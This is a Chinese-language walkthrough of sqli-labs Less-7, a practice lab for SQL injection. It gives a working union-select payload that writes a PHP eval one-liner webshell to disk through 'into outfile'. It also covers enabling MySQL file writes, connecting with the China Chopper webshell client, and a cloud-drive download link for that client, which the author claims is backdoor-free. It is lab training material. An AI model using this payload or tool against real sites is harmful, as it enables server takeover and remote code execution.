sqli-lab教程Less-7

简介: sqli-lab教程Less-7

Less-7


使用中国菜刀连接,拿到shell。


1.开启写入权限


使用show variables like '%secure%'在MySQL命令行中判断

show variables like '%secure%';


如果这里为Null就没有写入权限


2.如何修改本地写入权限


通过修改 MySQL 下的 my.ini 配置文件就可以启用权限,需要把下面这个字符串写入文件中。


secure_file_priv="/"


再次查看此参数,若参数值不为 null 则修改成功。


3.判断注入


使用单引号报错,但使用- - +注释符未回显正常,继续探测…


当使用单引号+双括号探测时,使用- -+回显正常,成功找到注入点。


使用into outfile写入函数

?id=1')) union select 1,2,'<?php @eval($_POST["caidao"]);?>' into outfile "写入自己的路径"--+



WebShell


使用中国菜刀连接


连接成功


还可以使用终端打开,可见一句话被写入的危害。


中国菜刀安装包(此包从GitHub下载无后门):


https://pan.baidu.com/s/1MCY4TDR_xJwZPFKKvse4Ig


提取码:nw6x

目录
相关文章
|
6月前
|
安全 数据安全/隐私保护
sqli-lab教程Less-5
sqli-lab教程Less-5
70 0
|
6月前
|
安全
sqli-lab教程Less-9
sqli-lab教程Less-9
67 0
|
6月前
|
安全
sqli-lab教程Less-8
sqli-lab教程Less-8
74 0
|
6月前
|
安全 数据安全/隐私保护
sqli-lab教程Less-4
sqli-lab教程Less-4
41 0
|
6月前
|
安全 数据安全/隐私保护
sqli-lab教程Less-2
sqli-lab教程Less-2
47 0
|
6月前
|
安全 关系型数据库 MySQL
sqli-lab学习笔记
sqli-lab学习笔记
36 0
|
6月前
|
安全 数据库 数据安全/隐私保护
sqli-labs---第三关
sqli-labs---第三关
|
5月前
|
数据安全/隐私保护
【less-3】sqli-labs靶场第三关
【less-3】sqli-labs靶场第三关
|
6月前
|
SQL PHP 数据库
Sqli-labs靶场搭建
本文章是在自己在使用新版phpstudy搭建靶场过程中遇到了很多问题,但在查询无果后,决定尝试旧版的phpstudy看能否成功,很幸运,成功了,也并不是网上的教程,说是php必须在5.2及以下.我使用的是5.4版本的.是对SQL注入进行一个简单的回归,然后就是对于自己在搭建靶场中所遇到的一些问题的解决办法,以及进行安装步骤的总结,对于自己的自主配置和独立解决问题的能力是一种培养
|
6月前
|
PHP
8、sqli-labs环境
8、sqli-labs环境
39 1